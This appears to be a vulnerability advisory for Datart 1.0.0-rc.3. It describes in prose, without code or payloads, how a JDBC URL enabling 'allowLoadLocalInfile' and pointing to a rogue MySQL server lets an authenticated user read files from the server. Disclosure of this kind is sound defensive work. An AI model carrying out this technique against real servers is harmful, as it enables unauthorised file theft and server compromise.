Datart JDBC Connection URL Injection Vulnerability Allowing Arbitrary Code Execution

A vulnerability allowing arbitrary code execution has been identified in Datart version 1.0.0-rc.3. The issue arises in the data source configuration module, where the application fails to properly validate the JDBC connection URL. This lack of input validation allows remote attackers with privileges to configure data sources to inject malicious parameters into the JDBC URL. By directing the JDBC connection to a rogue MySQL server, attackers can exploit the 'LOAD DATA LOCAL INFILE' feature to read local files from the Datart server, potentially leading to server compromise.

Impact

Exploitation of this vulnerability allows authenticated attackers to execute arbitrary code on the server by reading sensitive files, such as configuration files or source code, and injecting malicious payloads.

Reproduction

To reproduce this vulnerability, an authenticated user with privileges to configure data sources can send a POST request to the Datart server's data provider test API. The request must include a JDBC connection URL that points to a malicious MySQL server controlled by the attacker, with the 'allowLoadLocalInfile' parameter set to true. Once the connection is established, the attacker can use the 'LOAD DATA LOCAL INFILE' feature to read arbitrary files from the Datart server's file system.